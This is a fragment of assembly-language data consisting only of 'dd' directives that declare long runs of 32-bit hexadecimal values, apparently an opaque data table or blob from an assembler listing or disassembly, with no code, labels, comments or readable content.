dd 0A4345D39h, 0C6D9C759h, 0FA5207E5h, 2F59A122h, 0DD2AE1A6h
dd 0ED2F428Eh, 0D69A91BCh, 3C3835F7h, 53CDCDDBh, 30F86D54h
dd 33AFD339h, 39844533h, 459FA3A8h, 0D38F4634h, 0EC97658Fh
dd 3B24C4DBh, 0CC344BC0h, 0CDDC118Ch, 0EA75EF85h, 5866FD61h
dd 6A595FD9h, 86087DB3h, 770B8AFBh, 32601B46h, 0CCC2885Ch
dd 1EC8BA56h, 71D6C75Fh, 0C4E2218Ch, 80CAB2Dh, 9844A52h
dd 9220B887h, 357963EDh, 1DC06666h, 8D4E1037h, 0B5A6E08Dh
dd 0AD8AFC16h, 86E8802Dh, 76CCAFFh, 0C975010Dh, 4ACDB54Dh
dd 19DA323h, 35882200h, 170D2A1Bh, 89DE6DCCh, 0FF91AFDh
dd 40B76804h, 0A57C9CB0h, 705E0028h, 0B2B7460Eh, 0F96E7732h
dd 0E320721Ch, 1EAAEA02h, 0A0588F25h, 883C765Dh, 0B07401E1h
dd 871C722Ah, 206CCC0Ch, 0E03F6D4Ch, 84E7B9D0h, 0A542C3E3h
dd 0DB57EE41h, 0F0899FBFh, 0D31784CBh, 612617F4h, 26319B00h
dd 3EC92279h, 98EA1097h, 284FE266h, 106F3F93h, 4F386686h
dd 1E905F31h, 1D0F339Eh, 906DB452h, 702632F4h, 59A85B5Eh
dd 7D3F3FEBh, 36B11129h, 75BA3D64h, 9487B4F1h, 0B046B8F0h
dd 2642DBE8h, 8DF28237h
dd 0CEBBCCCEh, 3E731903h, 62483F66h, 37E7ED1Ch, 0EB9F663Fh
dd 0F3BDB437h, 0B5E1A5A8h, 0D9A152E4h, 0CD1EB781h, 0B5BF3319h
dd 0B8E05CAh, 0F2F086FCh, 0C5C392B7h, 0C01C1FC0h, 3504ECA2h
dd 0A5563864h, 0C45EDCBFh, 4AAAF177h, 0F5E434B8h, 7D4E917Fh
dd 2FD7F174h, 0B1C6CC51h, 0C436AC4Bh, 0DF8246BBh, 0AE9AF7AEh
dd 0EF2165E9h, 6E5A3386h, 430C725h, 9AF4192h, 0D4595D17h
dd 0B5C45A7Dh, 0A91D2F35h, 0A41CE777h, 0B8581047h, 57F346F5h
dd 0B78A575Bh, 6191888Ch, 4E8B28FFh, 85829A8Dh, 0B260ABEFh
dd 2DC3394h, 4C7CB32Dh, 2484605Eh, 3D7846Fh, 323AF153h
dd 98CCC3Ah, 6E71F62h, 8F8FE89Ah, 0C9B6352Dh, 5805ECF6h
dd 4E8EC556h, 554F7B55h, 3B0FDF7Eh, 0AF7B5792h, 613BC458h
dd 25BB1FBCh, 0DA2E2671h, 22BEBA41h, 76C691FDh, 5FF09DD5h
dd 78A07E7Ah, 0DEA2C950h, 0A543364Eh, 7ECDBE3Fh, 0A4E8BE6Bh
dd 0D06A650Eh, 483DBFB2h, 404F0E9h, 8627A90Ah, 80C73C38h
dd 0E23B20DCh, 0CA90237Ch, 0C2875BCh, 0A0CCDDBBh, 7788342h
dd 10588B73h, 0F74935C3h, 7B98F3C3h, 3054CCF2h, 0CF8DC287h
dd 0AC72BF6Ah, 7FD2B11Eh, 0B73C4720h, 8214AFA2h, 471645B5h
dd 0E32E81CDh, 0BE6972B9h, 0DEAB2BA4h, 0C6D78A47h, 0BB70F742h
dd 8A02FC63h, 89ADF2A0h, 0CDE17039h, 0A9216970h, 217D65F9h
dd 38DEEE53h, 0A2115031h, 3421F13Eh, 0ADAB18CEh, 647674D1h
dd 352B0948h, 4CA02111h, 8FEA784Ah, 0A0ADA452h, 0F9A3DEA3h
dd 9B5CEEBCh, 0E2FFB968h, 0A89F1B73h, 6978B5C3h, 0B3BCC40Ah
dd 0E6A1FCCEh, 6353A621h, 32288E8Bh, 0ED6919A1h, 0CFC7471Dh
dd 0F272AD4Ch, 0B537941Bh, 1EB89375h, 0D51A900Fh, 0FE86F4DBh
dd 9E209A1Fh, 5D727509h, 660F3100h, 0D6B57D93h, 4953F39Bh
dd 0DFA89D45h, 0B72BCBFEh, 0E48E3A80h, 77C9DD86h, 0CF5462A1h
dd 7693A8E8h, 0BF42F7AEh, 0B3FABFCh, 6869A5Ch, 67FC3D70h
dd 74BC98D8h, 9F82E7D4h, 37DA3E08h, 27153CE0h, 2F7C4D2Ch
dd 0CC8D9EEh, 8C973800h, 0A70554FDh, 0AED6FC84h, 0DFB2110Ch
dd 30667F0Ch, 4A964556h, 7F7F55h, 0D2ED888Eh, 1A637BECh
dd 0D21B4414h, 0F8D09820h, 0D9A91670h, 1007CBE2h, 49231D5Bh
dd 0B540969Ah, 4BF53E4Bh, 25998302h, 0CDC8502h, 0D65B8CFCh
dd 8ED07983h, 0F270BF14h, 0E27C8AFCh, 0E5F3B2AEh, 0BA73B38Dh
dd 9B1ECB4Fh, 1A1B31A8h, 191FD335h, 35F19B6Ch, 8FCAC859h
dd 0AC42F4DAh, 5109DFBBh, 5EF57021h, 2840EA37h, 0C6C94FB3h
dd 0F43D5519h, 0FE4F8F09h, 0FAC59ABDh, 0BBFFE693h, 0F9AE19Ah
dd 0CCCA1F15h, 2877D836h, 0DA9E84FAh, 20BB8877h, 0D7CCF584h
dd 0C43F36F9h, 41ACFA05h, 0FB868797h, 4F2DEB1Dh, 0AE8132A9h
dd 0B80530DDh, 43C238F6h, 0FD37B8F4h, 5CF52B2Fh, 6E3647DCh
dd 4EC5DECEh, 0C2BE4CF7h, 7692F162h, 1B3FD94Ch, 0A317B9D6h
dd 0AC3CCD75h, 109CE1E4h, 5793CD1Eh, 6A5D7CB0h, 25D491Dh
dd 143F9FD4h, 0B163DD18h, 31BBA38Ah, 4EBC8028h, 5722F94h
dd 218289AFh, 547A8D4h, 7261DAE6h, 0B7D368E4h, 0D43C3ED9h
dd 67F8C82Ch, 699B92F0h, 83AD13E6h, 0B2BAD00Eh, 172D4620h
dd 0AA3B97E0h, 6E39BCDh, 5BACF23Ah, 0C63C1C0Bh, 38657BE0h
dd 75C00445h, 0C84E861h, 0A980DD7h, 0ECE0F4E9h, 8C33C3C4h
dd 47FC0470h, 0AE137A3Dh, 0E3FD1383h, 13417306h, 8615D02Ah
dd 0D11DE12Bh, 622B0459h, 5978CBAFh, 0AF3E91C4h, 0DD3FD901h
dd 29297592h, 0B5EEF3C7h, 885CF023h, 0E9B68395h, 0DC841831h
dd 0F1C767B5h, 0EED8CAB7h, 0FFA5757Ch, 7B07AD75h, 0E8CAA709h
dd 90DF550Eh, 0BB29E613h, 0F7F59928h, 79D9043h, 4949E56Eh
dd 3CA42383h, 401A69Dh, 0EFF7E515h, 7AB05A08h, 0FF89D405h
dd 5AC745D6h, 36B8060Bh, 0DDA7EDE9h, 3C28F25Ah, 0A73B778Ch
dd 2DC32959h, 9D1F94CAh, 3E0D9B4Bh, 6C6ECD74h, 0EB56B9F9h
dd 0B8FBA919h, 5470AAC8h, 93FA6163h, 6427772Ah, 19D7BDCBh
dd 4EA7CA1Eh, 89B74051h, 0B110D36Dh, 5C582ABh, 6F165372h
dd 250B6C46h, 5E50D5E4h, 1D82C1Fh, 5ED945A2h, 27A6B860h
dd 0C871D718h, 750B9AF6h, 98013F18h, 0D6AAB595h, 2F56A9B9h
dd 12F1A721h, 439A889Ch, 0A1E1DDA0h, 29177B70h, 559F6039h
dd 781796D3h, 0A3E6BF99h, 9AF88D71h, 0E12393AFh, 0BB43882Ah
dd 0C9375CDEh, 1BA62F6Ah, 6F061D78h, 6FD528AEh, 69E53Ah
dd 96DB2961h, 8115BA2Ah, 0D7579F0Bh, 36C535B2h, 0F92B101Ch
dd 78956E48h, 601FC6E9h, 599C8E23h, 11FBC6B2h, 0D9E77E79h
dd 0C3FDDDDDh, 0BB111EBFh, 5570761Ch, 0BB73A56Eh, 52524B1Fh
dd 12625B43h, 314C8662h, 0CC3E501Ah, 0E26C29E3h, 2E7A8262h
dd 5FF118EBh, 0DE6BA154h, 42DBB125h, 14EB650Eh, 0E57CB61h
dd 0E48D3F85h, 0F5FE586Bh, 575F0A3Bh, 1651A8FDh, 0A1F4D4FFh
dd 3260AE2Dh, 327EA07Ch, 5CA55CE9h, 3037656Fh, 0DBC6052h
dd 0B42A4931h, 8911B9BFh, 818CE2E7h, 0A4A26B6Dh, 0E85CAE31h
dd 77E881A1h, 0EAE72EADh, 0A78712B3h, 0AA95A031h, 0FBE019DAh
dd 0A25CD9BAh, 44B76C70h, 0EC6FB6FBh, 66ECF6F3h, 55166916h
dd 264F1D9Bh, 99A16600h, 1642792Dh, 873E3DC2h, 4D39CDBCh
dd 6AF1FC97h, 9028CF6Dh, 0DFB621DBh, 0BDF2FF0Ch, 0AE0D37E3h
dd 0AF7F7D30h, 327B3E18h, 5722D105h, 0F2114AC2h, 0A860582Fh
dd 0E99C22A8h, 9D0D150Eh, 0AB65B172h, 28639CA3h, 80DE1B69h
dd 2E0F258Eh, 25F469DEh, 6D70F712h, 6C16D068h, 0C996E2E3h
dd 30702B83h, 924CCD17h, 0B90FCC9Fh, 2584FA7Fh, 3884C06Ah
dd 0C453E1A3h, 0C4CFC6Fh, 85E117D7h, 0EC8EC88Dh, 0FCF94D24h
dd 0E433250Dh, 0EDF61781h, 1D8A57Eh, 57BE8BA6h, 890057B8h
dd 0FD9340DCh, 5E4A1A0Ch, 73F29A5Dh, 0D44FBEC4h, 27CEE365h
dd 551483E6h, 0EA4329A4h, 299FE68Dh, 0F2DF09F0h, 0D1DE402Eh
dd 879C38B1h, 98FC089Dh, 0E3753541h, 8EAE35AFh, 4AFDA62Dh
dd 16E30BE2h, 79056DD4h, 6789CC5Eh, 9A3895CAh, 4A4F74F2h
dd 49E66536h, 9FC0D11Ch, 9A5AEB92h, 71D4D27Ah, 0CE08A8F5h
dd 1632CA92h, 3628F6F2h, 2913A6B0h, 20609123h, 0F599334Bh
dd 0DD75B768h, 4CB63431h, 6899BACBh, 0CC250DFBh, 0EA8CA658h
dd 0FE581BA1h, 0E44CDBA2h, 8BFB0029h, 62B69331h, 0CC26E3D7h
dd 7231153Fh, 0A00A32B4h, 67E13287h, 0BAB73A65h, 81C6563Bh
dd 799589A9h, 244A0A5Fh, 8EA5FDA9h, 3F1DD72Dh, 467BF3C7h
dd 37E6187Ah, 0E0775513h, 50694051h, 9B246C1Dh, 77A50Fh
dd 2DEA579Ch, 0E1F9612Bh, 88373EDAh, 1075F738h, 95750405h
dd 0C5D31115h, 0F665885Dh, 0B4929AD0h, 6F00157Bh, 3AA8151Ch
dd 56CF8699h, 0AFFD391Eh, 841E6BF9h, 0D4A01E55h, 34A583C8h
dd 53F56212h, 0C69A12FAh, 89FD2C38h, 1ADE6BA3h, 5923A7D5h
dd 22A5A136h, 30AC2710h, 0E19F203h, 6D7981E6h, 77CF533h
dd 0BA1CB11Bh, 0B05D77ADh, 2E2F2B3Eh, 0E12A7758h, 0B72BF3D7h
dd 0C1A54627h, 9DF55EF2h, 7EBECE98h, 4CACAF88h, 0DB6F1080h
dd 0EAA362B6h, 89B54BBCh, 0D2D333E3h, 29A4EF3Dh, 2B5680CDh
dd 80FB63D1h, 91137271h, 58939D3Eh, 0C9D3154Ah, 514DBA7Eh
dd 4289CD4Eh, 0A6783A0h, 319519D7h, 304D50DEh, 3C3207ABh
dd 0EF7D0B07h, 0CB0E35EEh, 4A654C57h, 4A68DE26h, 370806DBh
dd 9E70D235h, 12CC51D1h, 1CA18CF5h, 647B939Ah, 123AFA20h
dd 3381CABBh, 1CEBD7FDh
dd 85122A16h, 0AB846BA0h, 0F065B06Bh, 48263648h, 9C4766E4h
dd 0B232C8EBh, 908F4A66h, 10BB142Dh, 0C2D61FF2h, 9D3098A3h
dd 3C240E17h, 7BDE7E54h, 0CA5E82BCh, 4C74EB9Fh, 21C6371h
dd 127C03CAh, 2F3C5FC7h, 0F7AA859Dh, 0CC29D59Bh, 0C420AF24h
dd 86C51AF4h, 7F530FF9h, 643F5233h, 0E0C4D81Fh, 483CD015h
dd 1D1A2D56h, 0FBCE32Ch, 9D737DBDh, 0D51CEB4Bh, 737478BCh
dd 0A606FDAh, 598FF3C7h, 0DCD49EC3h, 7BFD0D43h, 0E0C56AF7h
dd 466C18ECh, 0BF42DBBFh, 3FE9F186h, 0A9455F75h, 7C3B1A9Ah
dd 52533E32h, 0E9FBAC1Ah, 9AC28830h, 91E9ECA5h, 6E1994D7h
dd 0F0F985A4h, 0AF3C841Ah, 63FF31D5h, 6DA33DC6h, 1AAEEE9Ah
dd 450F7368h, 61FF1D73h, 489113C2h, 591C83A5h, 5C54C0DEh
dd 7D5518Bh, 5FB99B83h, 0F24ED037h, 0CF028494h, 15297AEDh
dd 6E2A2977h, 0E429B9C6h, 0B4F84156h, 460F8D62h, 32FAEC2h
dd 3061E56Bh, 6149878Fh, 1FAD5053h, 0EA52FCA3h, 80F60E1Dh
dd 78AAFFFEh, 0E07E2A4Ch, 0ECF73E9Dh, 7F6F2542h, 0C5E3D18Eh
dd 0FCDBB507h, 0EEFAD2E4h, 555268F1h, 54F780EDh, 195AB5DAh
dd 0BB80B3D5h, 0D8880DB1h, 2330A345h, 0E080986Bh, 73EA5D53h
dd 66309A49h, 9F92D7D5h, 0F76E8483h, 0A54FE275h, 0B492ABB2h
dd 5EF23258h, 0E5912793h, 0C6615332h, 7C0B308Dh, 3B3ACF6Ah
dd 0F0C8A3B3h, 3F4875D9h, 0A3F7F178h, 0EFA42B35h, 2F66451Eh
dd 40B2CF02h, 0AE053CE8h, 32BDCA88h, 0E6F584FDh, 575A738Fh
dd 0FB215BDh, 5B708BEBh, 0FAAFF933h, 0AFB0F961h, 50913D29h
dd 0ADEFF71Ch, 383C8FDDh, 0E68F827Eh, 65BC246h, 0A78D3D76h
dd 6A9F24AEh, 0AFB9203Dh, 710A7FEBh, 0DFC79B0Ah, 87DBDFFEh
dd 54FC7FCFh, 0C0C9C902h, 0DEE22B70h, 155115E0h, 0E594E870h
dd 0A81BA984h, 0DBD73A4Bh, 8709AC2Eh, 2FA244D0h, 360105D3h
dd 0DBDBEBBDh, 662F543h, 6D1CA6A3h, 0EA31EE77h, 0B3B883D5h
dd 9329DD56h, 0E884ABA0h, 35BCD1B9h, 6E2E00A4h, 352381Fh
dd 2D35E317h, 0D94AB1B4h, 21427B71h, 36CFA4EFh, 0AF7F7AB0h
dd 846220DCh, 2F248923h, 0A35A92EEh, 0D912D176h, 13B5CA12h
dd 1CC1BACEh, 0AACACC29h, 6C650E06h, 77941358h, 6F882EC5h
dd 0EFA3C42Dh, 0D05FE6CFh, 4D76E0C3h, 10F1EBEDh, 24CFA049h
dd 0EB00989Dh, 5FAEDEDBh, 0A92F80CFh, 0B9CD683Ah, 9C3BB7B7h
dd 3C9AEAC0h, 0EAE0C890h, 1BFCCD13h, 125FA4A9h, 0E895929Fh
dd 0DEE9864Bh, 5F85B31Eh, 868E5F58h, 19F19A68h, 28E62105h
dd 0AC98AE55h, 27165980h, 3A1EA1DBh, 0B4265F36h, 0AF64D15Dh
dd 0DD69DFDAh, 0AB8A0FD8h, 17270188h, 37FC1A76h, 9C6468D3h
dd 0C17E9D81h, 31A80570h, 73E6DBA8h, 28DAEBD5h, 2EDD8717h
dd 2D3A367Ah, 0A59E1981h, 6D069067h, 0FA090DFAh, 6962E66Bh
dd 0E8A28B27h, 0C98E1590h, 0EC0937B4h, 9FC018E1h, 0AA1B1B6Dh
dd 2CAA414h, 666E3683h, 45AAB32Dh, 0EA5CF65Bh, 0D36DA495h
dd 0C0E91F24h, 0DF3F462Eh, 0E82173B0h, 9AFE6F46h, 42C90DFEh
dd 9C501911h, 48CA0280h, 683B87FAh, 0A3595E2Ch, 1FF58D12h
dd 38EDFEF4h, 0A54E35A1h, 8D222156h, 4D1342C0h, 77835A0Ah
dd 1D085C2Bh, 0F05C3E4Bh, 0F96714E2h, 4C96C1D0h, 2E802007h
dd 85394BCh, 120F8D0Fh, 4660A19Fh, 6EEA25CCh, 0FF6EB40Fh
dd 40FFCBFFh, 0C9281B4Ch, 62937C86h, 0A2F1450Dh, 950701A4h
dd 0DAF879AAh, 0CFA7309Bh, 0CF7A8ED4h, 0C54DFF0Eh, 0EFEACD64h
dd 0B79F850Dh, 250B4BDCh, 0CB5539BDh, 0BFB8011Bh, 792FC464h
dd 6AD8A0A7h, 1C93B47Bh, 0C0BAA10Dh, 1E8D4C5Ch, 38122A70h
dd 56ED6D74h, 7908D6FDh, 3161BEF8h, 2472668Eh, 4175EB2Ah
dd 53CDAD3Ah, 786B06F6h, 6DFAB70Eh, 0AF4EE52h, 4B80D197h
dd 0B7A330A0h, 625C6C34h, 0AC12E312h, 4C05539Ah, 7A77230Bh
dd 25574A1Ch, 7CECE22h, 20A9056Fh, 49DD166Fh, 45A2565Ch
dd 261DFC33h, 644B9C15h, 6FAA9A01h, 20ACC4FEh, 0AF70A12Ah
dd 90E114BBh, 54B573D0h, 6416301Dh, 0B5AF5AF9h, 3F54F809h
dd 1577F444h, 0BB7532FDh, 7B5D39A4h, 68984BF7h, 0BA967DA4h
dd 0E6C1857Bh, 0F39C0EB1h, 0D594A7A3h, 0C8D7CC35h, 969B128h
dd 5ACE72D5h, 6205BA34h, 7F5C01B7h, 48A43FE5h, 9F2DC8h
dd 24F24E38h, 1EE858DCh, 9C98CB27h, 110F7A9Dh, 53A61338h
dd 0DE619D41h, 0D28686B8h, 0C919388h, 2F2F67DCh, 6D3998FEh
dd 0CB2F321Dh, 4F89A36Ah, 0FDB0028Bh, 795FF8DFh, 0A12A3ACFh
dd 41431A09h, 0AA329B4Dh, 1A9F8BDBh, 3CB7C64h, 47DE43EEh
dd 50DA449Dh, 88B16F63h, 9535861Ch, 0E946E164h, 1395B301h
dd 5D83897Ah, 0C60D7DC8h, 1DEF8EB7h, 0FB7FBD38h, 9C10BED5h
dd 8D92248Bh, 9C6FEF76h, 0D004BD11h, 0C2C35A8Ch, 70467940h
dd 0BE1B21Eh, 8EEA940Bh, 1788AF34h, 0E64BC002h, 6D2355F0h
dd 8AC0F1B3h, 8F11EE92h, 515D7EEFh, 0A406CAE5h, 289860F8h
dd 579F6A79h, 0CDE84F83h, 38B02598h, 3352E812h, 0BABBD328h
dd 0C6FDFD38h, 0E1C0F92Eh, 453BE96Dh, 55C0E77Eh, 0F8BDE32Fh
dd 321D55F4h, 5AB7B921h, 0BB6DE17Eh, 8419954Fh, 6D33FD7Eh
dd 24D4CBD5h, 0FB2C46D2h, 923DC52Bh, 0C51A688h, 982804E6h
dd 290F9564h, 4096A605h, 9C7C1A9Ch, 95F74E4Eh, 0AF33C463h
dd 0DFA030CAh, 1199A1Bh, 0EFBB46B7h, 0EEC098ABh, 0E8619552h
dd 0DD26C51h, 0B87A2BE7h, 87A02EC7h, 0A57370ADh, 0D947A5D0h
dd 908D053Ch, 0CD31F3A0h, 682BE7D8h, 7F3C43EBh, 0DD7245F0h
dd 67CD7CCh, 0B0C4FBFEh, 8A208527h, 0D4A87E03h, 21A9B0FDh
dd 6D50E024h, 2C30EE9Eh, 5AA56137h, 9971FC53h, 0DDA3E1ACh
dd 76DBBE0h, 9F5AD097h, 0E2276EAh, 0D2B9C2E0h, 3906C81Ah
dd 0E0F4EEADh, 92DE39E5h, 6AADC848h, 29C6D5BCh, 0E44B43B8h
dd 4FCBDE55h, 75256416h, 0C4152C4Eh, 459D8ECFh, 0A9F9D502h
dd 0CF19DD2Eh, 13D8EF29h, 0D4C05D3Bh, 90FB702Dh, 0D8D57E2Ch
dd 0D85EAD31h, 0B68E975h, 7C7BF870h, 0CD90C3D8h, 0D445C721h
dd 0FD613D73h, 4E213F81h, 6961943Bh, 701179C3h, 9E39827h
dd 0DAB13E62h, 0E7926263h, 4A4A756h, 7A48E12Ah, 834A529Dh
dd 5CA057FFh, 0D4FDC9ACh, 0B270DD22h, 64D4F7A3h, 0F4C400A1h
dd 4C637B7Dh, 8252EF2Dh, 3E211422h, 72563281h, 19215A85h
dd 5893FE7Ch, 77064091h, 0C77452E9h, 586EBDCEh, 0E5561ECh
dd 8FF26208h, 0C4DE4D12h, 2DCC6062h, 9B996BE8h, 0E7B9F503h
dd 0A143496h, 80EB0F09h, 0B415945Eh, 0DE2D6CD6h, 7B104C41h
dd 5C67C53h, 0D5A29331h, 69A9E34Ch, 0C6EC2207h, 0AC4CB176h
dd 4F494BD1h, 93AD0C7Fh, 3F9DCD48h, 2034665Eh, 1BCE8DAh
dd 0F0A6930Dh, 0BD0989BBh, 43203D6Ah, 977EF79h, 7F4EBA39h
dd 3CC966D4h, 0AF2D978Fh, 0B67F2722h, 2CBCF8ADh, 0A4DC5CB5h
dd 63854487h, 71544558h, 0A9B8E2D2h, 523D0156h, 0A461A061h
dd 8F509B9Ah, 40AAFCCCh, 4D6692FAh, 630F1900h, 0FED85F26h
dd 2B651CE5h, 571A2F9Bh, 1B81A455h, 0CF815A73h, 632AFB44h
dd 20E03DA5h, 0E5449A97h, 0F04D15E9h, 6798AC92h, 97D6B14Eh
dd 0FF308789h, 7DB5E0ADh, 44125ACCh, 0FED939D0h, 33E2D2F1h
dd 0EF108C13h, 0C511285Eh, 348B4B8h, 0F5474932h, 4D1F06BCh
dd 7DEDA7AEh, 86398BC8h, 37BD4A46h, 0E7592F9Fh, 356DD1FDh
dd 72CE468Ah, 44A20BE3h, 9F838E76h, 0C03350A3h, 2E7B9932h
dd 9790E93Bh, 0F8AA93FEh
dd 9282C2E5h, 0D2FCD41Bh, 0F02F1BBh, 21522556h, 2FB21FF0h
dd 560A9C5Ch, 5B9852E2h, 72CA2DA8h, 56FB94Eh, 79B0117Ch
dd 453160BBh, 13440B7Eh, 85743F04h, 2C13F9CCh, 0F4067A61h
dd 2AC0ED29h, 0BCC4F0AFh, 3070F5C7h, 0EA90593Eh, 9AB30A88h
dd 86029AA0h, 0EDA3447Bh, 4CFF1410h, 0BFEAF2B7h, 2EDFB5A3h
dd 9116EC9Dh, 666E3C4Fh, 4061CAE5h, 0CF14EDDDh, 0F4DD1463h
dd 8096B25Ch, 83B4A967h, 93652EB9h, 79C55CD2h, 7785B1B5h
dd 0ACBE6F5Dh, 0E67CD2ACh, 1FD1A16h, 0E22D33D2h, 0E977C8A0h
dd 0F712E455h, 6DD0F677h, 0AECC99CAh, 66445B22h, 2E379A51h
dd 2F18004Eh, 132C56F8h, 0B6C96C38h, 8B920EB1h, 2EEBE1B7h
dd 0FA051A98h, 312C709Ch, 48C0E2CAh, 0EF1B49A8h, 0DF05B1Bh
dd 0CEBEABEEh, 88688D53h, 0B5BC3FABh, 7A7D8335h, 7173760Ah
dd 0A807F45Bh, 310E12FDh, 33CE48B0h, 0E0BA7880h, 0A2EBFE84h
dd 25043F3Eh, 4ECDD2E7h, 0F3077E77h, 7A8DA366h, 0C0A359A0h
dd 7EA96293h, 87310FACh, 0F4E9A657h, 32C3B04Eh, 0A730C866h
dd 0CCB3ED09h, 550ECF60h, 0A13F747Ch, 9D72B73Eh, 0A835BF67h
dd 30B8EC2Ah, 0EE3BD76Bh, 12268B49h, 0A7708F31h, 1105DE94h
dd 1465C0D0h, 4F93BFFDh, 5EEBE916h, 0C03A30C3h, 93CA0693h
dd 0E25193A2h, 83B52D1Ch, 0D71441B8h, 0AAA0E697h, 936761C5h
dd 0ACD1A1B7h, 0D00C7843h, 411C1B1Eh, 0A9AE5626h, 0DFB8C1F9h
dd 26FB0883h, 158A5BC8h, 391377D5h, 69DD71F1h, 0B0141C3Ch
dd 428ACE78h, 8F23CA22h, 0D78A647Ch, 0F600FC5Fh, 79B0EF56h
dd 0FDCACBE7h, 6124185Bh, 6E1D2FFAh, 0AACF95DBh, 354681A7h
dd 41032A08h, 0A347F358h, 8620B495h, 0D9715823h, 0F1ABE67Dh
dd 0B953CCD9h, 0FFCC2319h, 38FBB072h, 64E873EFh, 14DF647Ah
dd 0B9CB6AE4h, 0BB34AC25h, 83620019h, 0C606F32h, 0FE89F2A0h
dd 8CED1914h, 1620806Dh, 0D40E4377h, 0AD03C4AEh, 939C20Dh
dd 3161316h, 4F6D413Ch, 0FF7A8C90h, 0D19EBAB0h, 530278DFh
dd 0F255FC3Eh, 4BEF5510h, 9E2D27E4h, 0D06FDC45h, 49D02A03h
dd 3DA3859Eh, 0B0A1568Ah, 381BB8BEh, 0E0BFEF87h, 9ABAB5E2h
dd 0BEF58Bh, 27ED3E31h, 9AF25CDDh, 4E11271Fh, 587910Dh
dd 72B9572Ah, 9FA0BDE9h, 0E21972ACh, 0D9ADE9FEh, 0B845A19Ch
dd 394351A6h, 0BCD21D32h, 26BAA61Bh, 1388BBEBh, 3974165Dh
dd 0C6058B9Dh, 5E47E8DEh, 1753EB0h, 0A77AEDA7h, 62B1B4EFh
dd 50FD9C3Dh, 9ABD63A7h, 25A72B14h, 49252E76h, 0D0F37431h
dd 15AB222Ch, 0D4B6649Eh, 42C13C2Dh, 0F26EA9DFh, 22C51C7Ch
dd 395C4BAAh, 544EFF45h, 0B4B6603Bh, 38C3157Eh, 0DADA7F54h
dd 0B927D1B9h, 0C053C02Bh, 4B8F9E6Dh, 59A66009h, 3A44C57Bh
dd 0E61E2F4h, 975BF0DDh, 0DD06552h, 4018741Bh, 1067308Ch
dd 0D2BDAC4Eh, 0AEF26D4Ah, 0BDCC9B7Eh, 0A8674CD4h, 7763B735h
dd 40E21193h, 0B050C80Dh, 7398252h, 5039D77Ah, 0FA049260h
dd 74BE8588h, 0D675B62h, 0D1216F6Dh, 0B8B37A80h, 588F638Ah
dd 17AEEB0Bh, 1AF4AAA7h, 60947971h, 0DC16D546h, 127EEA9Ch
dd 1E28D6BFh, 7742FB0h, 0B7F31F82h, 0C61464A8h, 8655A120h
dd 2284C23h, 281EF27Dh, 9A6A34FAh, 0FA61DA72h, 0A5673B1Dh
dd 8FCA8ED1h, 48FF16DCh, 0EC5B0DB4h, 0A221B8C4h, 0F274D84Fh
dd 7DFEE627h, 8BFF80h, 45CA1360h, 471915E3h, 1A2A3A88h
dd 9AA55FC7h, 0FE5F9CA1h, 0BFEE30B0h, 60CCAF05h, 9D891FFFh
dd 4D2E7F9Bh, 2B60DC40h, 0D52C33A4h, 58B4D3h, 926E9BF1h
dd 5645DC5h, 9FBCE858h, 8EA43421h, 537D0874h, 21C3EC57h
dd 0B8906633h, 2B4D3E65h, 0FDF45801h, 5C4D5554h, 1125BA58h
dd 0FFBA3F14h, 11A5D787h, 0FB305577h, 0D8A0FF2Ch, 0EC59DD99h
dd 0E842014Bh, 566F2C62h, 485D4DC4h, 0F9BFD0D5h, 614C8507h
dd 84523998h, 7DC854FDh, 0E67FC5E3h, 3E853BA1h, 3A2EC9F0h
dd 94E09A35h, 4C8C6D3Dh, 499DC0CAh, 6F7AE76Bh, 4F635BC3h
dd 0DB07C33Dh, 38FD1E31h, 4B3EE163h, 0B3E9B2A3h, 3EC92B0Eh
dd 10F67933h, 225CC115h, 6FDD2213h, 7DF40h, 904F5276h
dd 0BCFBBB65h, 0E8510186h, 0F7842660h, 0AE2B16BFh, 0E29048DFh
dd 6B2621DEh, 0BCED0D6Bh, 10E39EFEh, 622BEAD0h, 451063FAh
dd 203AEE63h, 0FE1E8AADh, 6EA1E10Ah, 9558ECF5h, 8D0F179Ch
dd 1844A74Ah, 0AE540C3Ah, 0A31E542Dh, 9A59FA90h, 57344073h
dd 0BFF07FE2h, 40965810h, 252A4DE6h, 0F81C108Ah, 606BDF8Bh
dd 0E25967h, 6776D0FCh, 0E97EF467h, 24F8C2B5h, 76672942h
dd 2F9B3A67h, 0C2DE6C2Fh, 0A2DD2FA9h, 1D4C7E79h, 2A0D74F7h
dd 5CA80F01h, 638DEB3Dh, 9C72D84Fh, 21EA8039h, 0C31693BBh
dd 0A148F8E2h, 6B54D62Eh, 9B63ED2Dh, 0EA7FCD78h, 268FC741h
dd 0BB6F1255h, 78C1E9E5h, 5AC0572Fh, 0A0F306C2h, 0FB937AE1h
dd 0F64EA4D5h, 0DC24557Ch, 0CC23D7A3h, 0B5BD8AFFh, 821011B0h
dd 0D7E7E4Ch, 898DCD43h, 32683E39h, 826CF529h, 0C8CE1AEDh
dd 74646E1Ch, 8DD2749Fh, 1340FAE9h, 1660A2C6h, 0C73AAAAEh
dd 0A342C21Bh, 2A490E2Dh, 5B6C97Dh, 4675C561h, 39176536h
dd 0A5700235h, 5CB75338h, 5AA27055h, 3DAD4C6Bh, 0D6C65BC3h
dd 14B2F282h, 0B5FC3999h, 0D5938A9Eh, 0A8A159EDh, 0B6C04675h
dd 0B40CC9E6h, 0E389AEFCh, 4B203992h, 0B3ABE80Ch, 7CA79048h
dd 8AE457B4h, 6EF14Ah, 0EE0D716h, 4CECDC4Eh, 4967EBF8h
dd 0F421EC66h, 0EB2CD5AEh, 2544C2E7h, 60C4E073h, 5F7A110Bh
dd 8556E211h, 75BE8BAEh, 7222FFC6h, 0FFACC700h, 316084DCh
dd 0EB4F02FCh, 175B0E58h, 10688B90h, 3FF285BAh, 9FD5487Fh
dd 0C3F7B86Dh, 7247ACD8h, 7A3384EBh, 0D311D6B5h, 0B98EDDAFh
dd 0D8DCC6CFh, 5DB11D81h, 0D684BBC8h, 462E35B0h, 0F94B93F1h
dd 0BADE322Dh, 52152DA4h, 36471E97h, 5E609353h, 367BC40Dh
dd 99699B32h, 0D5873DE7h, 0D5286F39h, 0ADA3EE9h, 0BB725FF5h
dd 97A6211Dh, 407ECE39h, 1D874CB8h, 0E3F7C3C0h, 98C8F752h
dd 53BE52B8h, 98E6F67Dh, 0BEC5E20Bh, 0FDBFB937h, 227DF0EAh
dd 29E0243Ch, 977195B6h, 24BB5AA1h, 8431025Ah, 8F2AFAC8h
dd 0BF1D32C3h, 0CCA731CCh, 73D85F30h, 39072719h, 60F6FDADh
